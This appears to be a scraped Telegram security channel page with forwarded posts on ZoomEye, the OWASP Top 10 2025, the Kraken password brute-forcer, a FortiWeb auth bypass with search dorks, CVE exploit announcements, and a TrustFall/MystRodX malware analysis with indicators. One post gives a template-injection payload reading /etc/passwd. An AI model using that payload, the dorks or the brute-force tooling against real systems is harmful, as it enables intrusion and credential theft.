SecList for CyberStudents
238 subscribers
580 photos
23 videos
211 files
892 links
Think outside the box
Download Telegram
https://www.zoomeye.ai

Key Features and Functionality:

- Extensive Scanning Capabilities: ZoomEye performs continuous, global scans of the entire IPv4 and IPv6 address spaces, detecting open ports, services, and devices.

- Comprehensive Fingerprint Library: The platform maintains a rich database of over 40,000 fingerprints, covering various devices, operating systems, databases, and web applications, enabling precise identification of internet assets.

- Advanced Search Syntax: Users can perform detailed searches using specific queries, such as filtering by application, version, country, city, port, operating system, service, hostname, IP address, and more, facilitating targeted asset discovery.

- Vulnerability Detection: ZoomEye integrates a vulnerability database, allowing users to identify security weaknesses in detected assets, such as outdated software or unpatched vulnerabilities.

and more.....

#SearchEngine
OWASP TOP 10 2025.pdf
3.6 MB
OWASP Top 10 (2025)

- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions
👍2
Forwarded from Proxy Bar
Видишь на сайте выбор Language, не поленись !
Language={${system("cat+/etc/passwd")}}
😁3🔥2
Forwarded from Codeby
Kraken

Kraken — мощный инструмент на основе Python, разработанный для централизации и оптимизации различных задач подбора паролей. Kraken предоставляет специалистам по кибербезопасности набор инструментов для эффективного проведения атак методом подбора паролей по различным протоколам и сервисам.

Kraken предлагает ряд инструментов для брутфорса:
1️⃣Сетевые инструменты - FTP, Kubernetes, LDAP, SSH
2️⃣Инструменты веб-приложений - CPanel, Drupal, Joomla
3️⃣Инструменты поиска - Admin Panel Finder, Directory Finder, Subdomain Finder

💻Установка:
git clone https://github.com/jasonxtn/kraken.git

cd kraken

pip3 install -r requirements.txt


📌Использование:
python3 kraken.py
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Suhayl.log
This media is not supported in your browser
VIEW IN TELEGRAM
Fortinet 0day

An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.

Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/

Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
Forwarded from Cat Seclist
CVE-2025-33073
*
POC я уже публиковал, а тут универсалочка подъехала.

Universal exploit

#win #DC #controller
Forwarded from Cat Seclist
CVE-2025-12101 + CVE-2025-21202
*
Citrix NetScaler ADC and Citrix NetScaler Gateway
*
exploit +xss tool
BloodCat

Инструмент для сбора информации о публично доступных сетевых камерах, с поддержкой фильтрации по стране и региону.

https://github.com/MartinxMax/BloodCat
🔍 TrustFall & MystRodX:

Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX.
Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки.
По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году.

🧩 TrustFall (март 2025)
Лёгкий backdoor: выполняет команды через /bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование.

🧩 MystRodX (август 2025)
Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через 139.84.156.79.

🗃 IOC
185.154.154.135
213.159.64.6
2.56.177.181
37.221.125.201
5.252.22.232
45.14.244.110
45.83.140.218
154.196.162.76
Сервер распространения
139.84.156.79
Конфигурационные файлы
tcbipkrn.config → 185.154.154.135
baeeajzb.config → 213.159.64.6
URI
/news/data_form.php
Поведенческие признаки
tar -czvf
rm -rf
/bin/sh -c "<command>"
шифрование трафика (в поздней активности)
смена канала управления

🎯 APT группы:
STA-2201
Группа, впервые замеченная в 2019, работает по двум направлениям:
Initial Access Broker (первичный доступ)
Классическая APT-активность: кража и эксфильтрация данных
Позже стала действовать более скрытно.
Сектора: госуправление, телеком.

STA-2404
Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты).
Активность отслеживается с 2024 года (две волны).
Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.


🔗 Ссылки
• Презентация: https://profitday.kz/pdf/security2025/15.pdf
sts.kz
• Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395
https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM